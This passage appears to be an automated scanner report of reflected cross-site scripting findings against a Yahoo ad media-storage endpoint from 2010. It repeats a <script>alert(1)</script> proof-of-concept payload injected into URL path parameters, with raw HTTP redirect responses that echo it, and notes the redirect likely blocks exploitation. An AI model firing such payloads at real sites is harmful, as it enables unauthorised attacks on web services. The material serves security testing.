<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex80bfa<script>alert(1)</script>f2ae7e14495/mediastore/383c4ed9-f242-4f61-b9cc-f1091f29b070</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a23eb<script>alert(1)</script>c1996285358 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastorea23eb<script>alert(1)</script>c1996285358/383c4ed9-f242-4f61-b9cc-f1091f29b070?noredirect=1
x-ysws-request-id: 8dfd597d-a41a-4484-b3a1-9f2925825065
Date: Mon, 15 Nov 2010 02:47:11 GMT
Connection: close
Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastorea23eb<script>alert(1)</script>c1996285358/383c4ed9-f242-4f61-b9cc-f1091f29b070</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 86c2d<script>alert(1)</script>d69f280c0fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/383c4ed9-f242-4f61-b9cc-f1091f29b07086c2d<script>alert(1)</script>d69f280c0fd?noredirect=1
x-ysws-request-id: e9fd8904-6866-4f78-8bdc-944409305cf1
Date: Mon, 15 Nov 2010 02:47:11 GMT
Connection: close
Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/383c4ed9-f242-4f61-b9cc-f1091f29b07086c2d<script>alert(1)</script>d69f280c0fd</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2683f<script>alert(1)</script>e6012a37d97 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex2683f<script>alert(1)</script>e6012a37d97/mediastore/52b2888f-eb6d-4556-a1ff-b178fce39ee6?noredirect=1
x-ysws-request-id: 6faaadb3-7f6c-4187-afcc-7cb0b881060e
Date: Mon, 15 Nov 2010 02:47:08 GMT
Connection: close
Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex2683f<script>alert(1)</script>e6012a37d97/mediastore/52b2888f-eb6d-4556-a1ff-b178fce39ee6</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dc93d<script>alert(1)</script>0f584ef95a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastoredc93d<script>alert(1)</script>0f584ef95a0/52b2888f-eb6d-4556-a1ff-b178fce39ee6?noredirect=1
x-ysws-request-id: f88fae0a-f89f-46b3-ad9d-e05ac105e397
Date: Mon, 15 Nov 2010 02:47:08 GMT
Connection: close
Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastoredc93d<script>alert(1)</script>0f584ef95a0/52b2888f-eb6d-4556-a1ff-b178fce39ee6</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 887a0<script>alert(1)</script>0e955ccd05b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/52b2888f-eb6d-4556-a1ff-b178fce39ee6887a0<script>alert(1)</script>0e955ccd05b?noredirect=1
x-ysws-request-id: 983cc645-db79-442d-9295-0a9b3986b273
Date: Mon, 15 Nov 2010 02:47:09 GMT
Connection: close
Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/52b2888f-eb6d-4556-a1ff-b178fce39ee6887a0<script>alert(1)</script>0e955ccd05b</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a4c02<script>alert(1)</script>e9432b0d3af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apexa4c02<script>alert(1)</script>e9432b0d3af/mediastore/5e6edab9-925f-4cc4-ae36-5a558abc5d6a?noredirect=1
x-ysws-request-id: a4322685-d549-4c9e-ad95-8253227cff39
Date: Mon, 15 Nov 2010 02:47:10 GMT
Connection: close
Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apexa4c02<script>alert(1)</script>e9432b0d3af/mediastore/5e6edab9-925f-4cc4-ae36-5a558abc5d6a</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1ae28<script>alert(1)</script>fe445d331e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore1ae28<script>alert(1)</script>fe445d331e9/5e6edab9-925f-4cc4-ae36-5a558abc5d6a?noredirect=1
x-ysws-request-id: db699bc5-50a5-44a4-b9f9-195ab3c2011f
Date: Mon, 15 Nov 2010 02:47:13 GMT
Connection: close
Content-Length: 170
<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore1ae28<script>alert(1)</script>fe445d331e9/5e6edab9-925f-4cc4-ae36-5a558abc5d6a</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3158b<script>alert(1)</script>83c13893aeb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/5e6edab9-925f-4cc4-ae36-5a558abc5d6a3158b<script>alert(1)</script>83c13893aeb?noredirect=1
x-ysws-request-id: 30d0f159-8a2b-4d5f-984d-d3f0e9b84b39
Date: Mon, 15 Nov 2010 02:47:14 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/5e6edab9-925f-4cc4-ae36-5a558abc5d6a3158b<script>alert(1)</script>83c13893aeb</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload daae7<script>alert(1)</script>ddb88bc0fd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apexdaae7<script>alert(1)</script>ddb88bc0fd6/mediastore/8ba866c3-ac17-4b3d-baf7-9a95af0665d7?noredirect=1
x-ysws-request-id: fda1710b-d12a-4b6e-af08-ff6ea2f3adfe
Date: Mon, 15 Nov 2010 02:47:08 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apexdaae7<script>alert(1)</script>ddb88bc0fd6/mediastore/8ba866c3-ac17-4b3d-baf7-9a95af0665d7</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d78c6<script>alert(1)</script>1c1bed06d69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastored78c6<script>alert(1)</script>1c1bed06d69/8ba866c3-ac17-4b3d-baf7-9a95af0665d7?noredirect=1
x-ysws-request-id: 6bd8ebdf-38eb-4e71-a7d5-4f806485fb94
Date: Mon, 15 Nov 2010 02:47:09 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastored78c6<script>alert(1)</script>1c1bed06d69/8ba866c3-ac17-4b3d-baf7-9a95af0665d7</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 26529<script>alert(1)</script>d4f8b951927 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/8ba866c3-ac17-4b3d-baf7-9a95af0665d726529<script>alert(1)</script>d4f8b951927?noredirect=1
x-ysws-request-id: 565b6772-c93e-4ddf-a914-da0f564b8581
Date: Mon, 15 Nov 2010 02:47:11 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/8ba866c3-ac17-4b3d-baf7-9a95af0665d726529<script>alert(1)</script>d4f8b951927</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 49b0b<script>alert(1)</script>a73dfe813ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex49b0b<script>alert(1)</script>a73dfe813ad/mediastore/8d3d0f79-5b47-4138-9678-2297d2caf879?noredirect=1
x-ysws-request-id: 0af2e37f-0848-41c2-af41-97fb4cf573c3
Date: Mon, 15 Nov 2010 02:47:10 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex49b0b<script>alert(1)</script>a73dfe813ad/mediastore/8d3d0f79-5b47-4138-9678-2297d2caf879</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee668<script>alert(1)</script>3f8c94910d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastoreee668<script>alert(1)</script>3f8c94910d9/8d3d0f79-5b47-4138-9678-2297d2caf879?noredirect=1
x-ysws-request-id: ec9c89b3-ff65-465b-9444-8422a987b98f
Date: Mon, 15 Nov 2010 02:47:11 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastoreee668<script>alert(1)</script>3f8c94910d9/8d3d0f79-5b47-4138-9678-2297d2caf879</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 64b01<script>alert(1)</script>272af64e524 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/8d3d0f79-5b47-4138-9678-2297d2caf87964b01<script>alert(1)</script>272af64e524?noredirect=1
x-ysws-request-id: 5a119b6f-a94a-46c6-a2cf-eb8820233db4
Date: Mon, 15 Nov 2010 02:47:12 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/8d3d0f79-5b47-4138-9678-2297d2caf87964b01<script>alert(1)</script>272af64e524</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b93b8<script>alert(1)</script>b7424893522 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apexb93b8<script>alert(1)</script>b7424893522/mediastore/93e8d828-2c6f-42fb-b852-7b8b0226097a?noredirect=1
x-ysws-request-id: abd31413-6f5d-4b70-8ac0-4f36b15a6aeb
Date: Mon, 15 Nov 2010 02:47:08 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apexb93b8<script>alert(1)</script>b7424893522/mediastore/93e8d828-2c6f-42fb-b852-7b8b0226097a</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4be3d<script>alert(1)</script>dc49770a472 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore4be3d<script>alert(1)</script>dc49770a472/93e8d828-2c6f-42fb-b852-7b8b0226097a?noredirect=1
x-ysws-request-id: 0b00d342-ddbd-42a1-8d04-326f694bba78
Date: Mon, 15 Nov 2010 02:47:08 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore4be3d<script>alert(1)</script>dc49770a472/93e8d828-2c6f-42fb-b852-7b8b0226097a</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52adb<script>alert(1)</script>cb503ec4565 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/93e8d828-2c6f-42fb-b852-7b8b0226097a52adb<script>alert(1)</script>cb503ec4565?noredirect=1
x-ysws-request-id: 4d9bbe28-565d-496e-9fcd-733f2e00ac0e
Date: Mon, 15 Nov 2010 02:47:09 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore/93e8d828-2c6f-42fb-b852-7b8b0226097a52adb<script>alert(1)</script>cb503ec4565</p>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73cb2<script>alert(1)</script>b637cd0aa47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex73cb2<script>alert(1)</script>b637cd0aa47/mediastore/99a22469-f4ac-4f28-89af-1b875134b000?noredirect=1
x-ysws-request-id: 9370c02d-4444-4fff-ba66-391bdfca54e0
Date: Mon, 15 Nov 2010 02:47:08 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex73cb2<script>alert(1)</script>b637cd0aa47/mediastore/99a22469-f4ac-4f28-89af-1b875134b000</p>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9e10a<script>alert(1)</script>f4eb4f99327 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore9e10a<script>alert(1)</script>f4eb4f99327/99a22469-f4ac-4f28-89af-1b875134b000?noredirect=1
x-ysws-request-id: efc32eb2-d7aa-4253-98fb-0f1176bfc980
Date: Mon, 15 Nov 2010 02:47:08 GMT
Connection: close
Content-Length: 170

<p> Error Code: 404 </p> <p> Error Message: Could not get object /ads/apex/mediastore9e10a<script>alert(1)</script>f4eb4f99327/99a22469-f4ac-4f28-89af-1b875134b000</p>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2050f<script>alert(1)</script>73af24b663c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Moved Temporarily
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
x-ysws-error-detail: not_in_objectstore
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Server: YTS/1.17.23.1
Location: http://gops.mobstor-1.vip.sk1.yahoo.com/ads/apex/mediastore/99a22469-f4ac-4f28-89af-1b875134b0002050f<script>alert(1)</script>73af24b663c?noredirect=1
x-ysws-request-id: 8976102d-56d4-46e6-86b6-8f599206329c
Date: Mon, 15 Nov 2010 02:47:09 GMT
